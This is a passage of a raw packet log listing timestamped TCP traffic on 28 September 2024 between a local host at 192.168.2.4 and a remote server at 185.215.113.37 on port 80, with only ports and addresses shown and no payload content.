Sep 28, 2024 07:32:12.541806936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541811943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541816950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541831017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541841984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541851997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541862011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.541874886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.541913033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.542349100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542357922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542370081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542377949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542396069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.542434931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.542581081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542591095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542601109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542612076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542622089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542630911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542640924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542648077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.542651892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542663097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542678118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.542700052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.542922974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542933941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542957067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542960882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.542968035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542979002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.542979956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.542987108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.542989969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.543010950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.543034077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625080109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625114918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625127077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625145912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625155926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625165939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625180006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625207901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625231028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625262022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625272989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625283957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625307083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625318050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625386953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625399113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625421047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625430107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625468969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625518084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625529051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625538111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625550032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625560999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625571012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625586033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625616074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625798941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625809908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625819921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625829935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625840902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625844955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625852108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.625873089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.625891924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626070976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626082897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626092911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626102924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626113892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626120090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626132965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626158953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626210928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626223087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626233101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626255035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626257896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626266956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626271009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626282930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626302004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626312971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626472950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626524925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626528025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626539946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626549959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626571894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626584053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626904011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626924038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626934052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.626951933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.626974106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.627055883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.627067089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.627078056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.627088070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.627100945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.627130985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.627182961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.627221107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628117085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628137112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628146887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628168106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628181934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628268957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628284931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628297091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628308058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628319025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628345966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628412962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628452063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628487110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628498077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628508091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628523111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628532887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628535986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628544092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628551960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628556013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628567934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628578901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628611088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628725052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628739119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628765106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628783941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628861904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628873110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628885031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628895044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628905058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628909111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628922939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628932953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628936052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628946066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628956079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.628956079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628972054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628981113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.628993034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629004955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629026890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629034996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629035950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629050016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629548073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629564047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629575014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629585028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629595041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629597902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629606962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629618883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629625082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629628897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629642963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629652977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629653931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629668951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629669905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629679918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629692078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629695892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629702091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629712105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629719973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629723072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629735947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629745960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629750967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629759073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629764080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629776001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.629789114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.629811049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630295038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630306959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630316973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630342960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630367994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630420923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630433083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630448103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630467892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630492926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630567074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630579948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630589962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630599976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630609989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630611897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630620956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630633116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630635977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630661964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630673885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630863905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630876064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630886078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630903959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630911112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630914927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630928040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630928993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630939960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630949974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.630954027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630971909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.630986929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.631129980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.631141901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.631174088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.631186962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.712888002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.712930918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.712943077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.712954998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.712992907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713005066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713030100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713047028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713099957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713103056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713112116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713124037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713135004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713139057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713146925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713164091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713190079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713300943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713313103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713324070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713335037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713344097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713356972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713392973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713557959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713570118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713581085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713591099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713598967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713603020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713613987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713618994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713645935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713656902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713705063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713717937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713726997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713745117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713763952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713793039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713803053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713833094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713872910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713886023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713918924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713932037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.713932037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.713970900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714006901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714019060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714029074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714044094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714045048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714056969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714076042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714086056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714242935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714255095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714265108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714276075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714287996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714294910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714298964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714325905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714339018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714529991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714598894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714699984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714710951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714747906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714793921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714806080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714816093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714828014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714843035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714854956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714880943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.714884043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.714921951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.715024948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715035915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715066910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.715075016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715111971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.715136051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715147972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715158939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715179920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.715193033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.715275049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715286016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715313911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.715339899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.715343952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715354919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715380907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.715399981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.715488911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715500116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715509892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715519905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715531111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:12.715531111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:12.715555906 CEST	49730	80	192.168.2.4	185.215.113.37
